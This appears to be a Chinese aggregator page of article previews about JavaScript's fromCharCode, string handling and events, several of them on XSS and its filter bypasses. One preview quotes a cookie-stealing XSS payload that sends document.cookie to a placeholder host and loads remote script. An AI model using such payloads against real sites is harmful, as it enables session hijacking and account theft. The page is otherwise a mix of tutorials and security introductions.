首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
C fromCharCode 函数
2024-09-06
String 对象-->fromCharCode() 方法
1.定义和用法 将ASCII码转换成对应的字符 语法: String.fromCharCode(n1, n2, ..., nX) 参数: n1, n2, ..., nX:一个或多个 Unicode 值 注意: 1.对象方法(实例方法):对象名.xxx() 2.类方法(静态方法):引用类型名.xxx() 举例: var str = String.fromCharCode(110,1,88) console.log(str) 输出:
EK中fromCharCode和parseInt的配合使用
基于web的漏洞攻击的第一步一般是:在landing page中通过<script>标签下的JavaScript脚本引入一些恶意链接.这些脚本往往会採用各种各样的混淆.加密手法来躲避AV和browser的拦截.以使得一些恶意脚本源码不轻易暴露.即使这些landing page被拦截,设计静止的混淆手法也能加大安全project师对恶意代码的分析难度. 利用JavaScript内置的parseInt函数和String对象的fromCharCode函数配合使用,来加密恶意脚本是一种常见的手法. 先
IE 浏览器各个版本 JavaScript 支持情况一览表
语言元素 语言元素 突发.IE6 标准.IE7 标准 IE8 标准 IE 9 标准 IE 10 标准 边缘 Windows 应用商店应用程序 __proto__ 属性 (Object) (JavaScript) N N N N Y V8:否 v8.1:是 $1...$9 属性 (RegExp) (JavaScript) Y Y Y Y Y Y 有关属性 Y Y Y Y Y Y abs 函数 Y Y Y Y Y Y acos 函数 Y Y Y Y Y Y ActiveXObject 对象 Y Y
JavaScript 字符串处理详解
一.创建字符串 创建一个字符串,将一组字符串用引号包起来,将其赋值给一个字符串变量. var JsStr="Hello,JavaScript String!"; 二.字符串查找方法 1.字符方法charAt(),charCodeAt(),fromCharCode() (1)charAt()函数 功能:返回字符串中指定位置的字符; 语法:String.charAt(n); 参数:n--字符在字符串中的位置(字符串第一个字符的位置为0); 返回值:返回n位置的字符,如果n不在0
Cross-Site Scripting(XSS)简介
最近才开始研究HTML以及安全问题.如果有什么说得不对的地方,望请指出. 在网络应用安全中,XSS可能是最常见,范围最大,所包含攻击方法最多,同时也是最难以理解的一种攻击.在OWASP所列出的十大网络应用安全风险中,其排名第二位,仅次于SQL Injection. 而在本篇文章中,我们将一步一步深入挖掘XSS的攻击流程,攻击手段,以及防御方法等各个方面. XSS示例 在深入了解XSS的各个方面之前,让我们首先了解XSS攻击到底是怎样完成的. 就以一个博客应用为例.其常常需要允许读者对博主的文章进
javascript string 函数集
JavaScript_String对象说明 string中文为"字符串"的意思,String继承自Object对象,此对象提供字符串的查找操作等函数 JavaScript字符串类型参见JavaScript字符串类型 String的内容是不可变的,下面介绍的String的函数都不能改变其内容(又复制了一份) 引用网址:http://www.dreamdu.com/javascript/object_string/ String对象构造函数 var strobject=new String
xss如何加载远程js的一些tips
在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现. 一个简单的例子 <script src=http://xxx.xxx/a.js></script> 这样更为简洁 <script sr
XSS初探
1 什么是XSS跨站脚本 跨站脚本是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户输入过滤不足而产生的.攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料盗取.会话劫持.钓鱼欺骗等各种攻击. XSS跨站脚本本身对WEB服务器没有直接危害,它借助网站进行传播,使网站的大量用户受到攻击.攻击者一般通过留言.电子邮件或其他途径向受害者发送一个精心构造的恶意URL,当受害者在Web浏览器中打开该
【使用 DOM】使用事件
1. 使用简单事件处理器 可以用几种不同的方式处理事件.最直接的方式是用事件属性创建一个简单事件处理器(simple event handler).元素为它们支持的每一种事件都定义了一个事件属性.举个例子,onmouseover事件属性对应全局事件mouseover,后者会在用户把光标移动到元素占据的浏览器屏幕的上方时触发.(这是一种通用的模式:大多数事件都有一个对应的事件属性,其名称定义为 on<eventname>) 1.1 实现简单的内联事件处理器 使用某个属性最直接的方式是给它指派一组
【温故而知新-Javascript】使用事件
1. 使用简单事件处理器 可以用几种不同的方式处理事件.最直接的方式是用事件属性创建一个简单事件处理器(simple event handler).元素为它们支持的每一种事件都定义了一个事件属性.举个例子,onmouseover事件属性对应全局事件mouseover,后者会在用户把光标移动到元素占据的浏览器屏幕的上方时触发.(这是一种通用的模式:大多数事件都有一个对应的事件属性,其名称定义为 on<eventname>) 1.1 实现简单的内联事件处理器 使用某个属性最直接的方式是给它指派一组
JavaScript 字符串处理详解【转自:http://www.cnblogs.com/mondLei/p/4096855.html】
一.创建字符串 创建一个字符串,将一组字符串用引号包起来,将其赋值给一个字符串变量. var JsStr="Hello,JavaScript String!"; 二.字符串查找方法 1.字符方法charAt(),charCodeAt(),fromCharCode() (1)charAt()函数 功能:返回字符串中指定位置的字符; 语法:String.charAt(n); 参数:n--字符在字符串中的位置(字符串第一个字符的位置为0); 返回值:返回n位置的字符,如果n不在0
Xsser
来源:https://www.cqhacker.cn/post-174.html XSSer使用说明 ================================================================ 简介:===============================================================跨站脚本者是一个自动框架,检测,利用和报告基于Web应用XSS漏洞.它包含几个选项,试图绕过某些过滤器,以及各种特殊的代码注入技术.
用JavaScript 来将数字转换成字符。
背景: 一切嵌入式设备上面的信息,比如设备名称,设备时区是可以写入到设备上面的寄存器中的(一个寄存器两个字节,2*8 bit),比如 -1 ,写入到寄存器中为 2d31,然后可以通过一些进程将寄存器中的数据上传到我们的数据库中来(比如mysql , postgres)需求: 我们现在要在web 网页上将设备的名称,时区解析出来. 方案:1. 将16进制的 2d31 转成10进制数据. parseInt('2d31', 16); //11569 2. 求解出 11569 存到两个字节中是,每个字
【Javascript语言精粹】笔记摘要
现在大部分编译语言中都流行要求强类型.其原理在于强类型允许编译器在编译时检测错误.我们能越早检测和修复错误,付出的代价越小.Javascript是一门弱类型的语言,所以Javascript编译器不能检测出类型错误. NaN是一个数值,它表示一个不能产生正常结果的运算结果.NaN不等于任何值,包括它自己.可以用函数isNaN(number)检测NaN. Infinity表示所有大于1.79769313486231570e+308的值. /运算符可能会产生一个非整数结果,即使两个运算数都是整数. 对
【转载】目前主流过滤XSS的三种技术
目前主流过滤XSS的三种技术 过滤 过滤,顾名思义,就是将提交上来的数据中的敏感词汇直接过滤掉.例如对"<script>"."<a>"."<img>"等标签进行过滤,有的是直接删除这类标签中的内容,有的是过滤掉之类标签中的on事件或是'javascript'等字符串,让他们达不到预期的DOM效果. 编码 像一些常见的字符,如"<".">"等.对这些字符进行转换
[读书笔记]javascript语言精粹'
人比较笨,以前只做项目,案例,然而一些javascript的很多理论不知道该怎么描述,所以最近开启一波读书之旅: 标识符 1.定义 标识符以字母开头,可能后面跟上一个或多个字母.数字或者下划线. 2.用处 标识符被用于语句.变量.参数.属性名.运算符以及标记. 数值 1.数值在内部被表示为64位的浮点数: 2.NaN是一个数值,但是它不与任何值,包括它自己,即 NaN !== NaN 为 true: 3.isNaN可以检查数值是否为NaN: 4.方法: number.toExponential(
Python爬虫入门教程 62-100 30岁了,想找点文献提高自己,还被反爬了,Python搞起,反爬第2篇
学术搜索 学习理论的知识少不了去检索文献,好多文献为你的实操提供了合理的支撑,我所在的大学内网默认是有知网账户的,非常NICE 今天要完成的网站是 http://ac.scmor.com/ Google学术搜索是一个文献检索服务,目前主要是提供维普资讯.万方数据等几个学术文献资源库的检索服务.通过Google学术搜索只能够查找到这些学术资料的"报告.摘要及引用内容... 来源百度百科 我们的目标 获取现在访问的链接地址,当你使用谷歌浏览器的开发者工具抓取的时候,得到的是一个js加密函数 注意看上
XSS 绕过技术
XSS Cross-Site Scripting(XSS)是一类出现在 web 应用程序上的安全弱点,攻击者可以通过 XSS 插入一 些代码,使得访问页面的其他用户都可以看到,XSS 通常是可以被看作漏洞的.它允许攻击者绕过安全机 制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,cookies,或者其 他的东西,XSS 分为三类 XSS 分类: 非持久性,持久性和基于 Dom(此类可以是持久的,也可以是不持久的) 非持久性:非持久性 XSS 也被称为反射性
xss小结-从xss平台搭建到csp规则
0x00前言 xss是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的作用,测试的时候我们是用alert(1)弹窗,而做CTF也好,实际中的漏洞利用也好一般是用xss获取管理员的cookie 0x01xss平台搭建 网上有xss的在线平台,但是别人的总没有自己的用着舒服,于是可以试着手动搭建下属于自己的xss平台 首先要拥有自己的vps,能有公网的ip,才能把目标的信息发送过来 这里搭建推荐用蓝莲花战队的github一个项目:https://github.com/firesunCN/Blu
读《javascript语法精粹》知识点总结
昨天泡了大半天的读书馆,一口气看完了<javascript语法精粹>这本书,总体来说这本书还是写的不错,难怪那么多的推荐.<javascript语法精粹>主要是归纳与总结了javascript中的重点知识,下面我把我看玩后觉得比较重要的知识点分享出来. <javascript语言精粹>重要知识点 一.比较有意思的递归函数 1.一个有意思的递归,形成数据结构,0,1,1,2,3,5,8,13……(其实在我的<javascript常用知识点集>中也写过这个递归,
XSS绕过学习
目录 1绕过单引号 2绕过 SCRIPT 过滤 3使用 IMG 源 4使用制表符 换行符和回车符 5使用空白符 6双引号配对的 bug 7绕过css过滤器 8不全面的过滤器 9转义字符 10编码 1,绕过单引号 我们假设管理员在我们的单引号之前放置了一个“\”,有时候双引号之前也会放置,通过一些类似 add_slashes 的函数可以实现,这个就是转义字符,我们先前的代码就会变成这样:<INPUT type="text" value='\'><SCRIPT>
热门专题
python3双引号 单引号 建议
httprunner 两个用例同一个入参
hive 如何查询表注释
fragment 多个按钮点击事件
Windows上关于fin_wait_2连接较多的处理
阿里云iot 报警怎么发邮件
php表格数据管理系统源码
java解析excel一列
小程序请求图片添加header
Highchart 中文
plsql delete from 停不下来了
oracle dblink 协议适配器错误
openwrt映射文件夹
httprunner 获取请求包
link2005已经定义
python中的小偷问题
sap slt大数据量
sqlserver链接服务器参数化查询oracle的表的语法
fileoutputstream生成文件乱码 Java
lean anderson 在线观看